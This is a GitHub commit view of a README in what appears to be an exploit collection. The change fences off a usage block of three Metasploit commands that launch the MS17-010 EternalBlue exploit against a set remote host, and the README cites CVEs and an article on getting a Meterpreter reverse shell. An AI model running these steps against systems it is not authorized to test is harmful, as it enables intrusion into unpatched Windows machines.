Skip to content

Commit 17fbe61

Browse files
committed
MS17-010
1 parent 1b7ff5f commit 17fbe61

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

MS17-010/README.md

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -12,10 +12,11 @@ Vulnerability reference:
1212
* [CVE-2017-0147](http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147)
1313

1414
## Usage
15+
```
1516
msf > use exploit/windows/smb/ms17_010_eternalblue
1617
msf exploit(ms17_010_eternalblue) > set rhost 10.10.1.13
1718
msf exploit(ms17_010_eternalblue) > run
18-
19+
```
1920

2021
## References
2122
* [Windows2012上如何通过攻击ETERNALBLUE获得Meterpreter反弹](https://mp.weixin.qq.com/s?__biz=MzI5MzY2MzM0Mw%3D%3D&mid=2247483946&idx=1&sn=cbe2e5a08470d699daeb74d7904581c7&scene=45#wechat_redirect)

0 commit comments

Comments
 (0)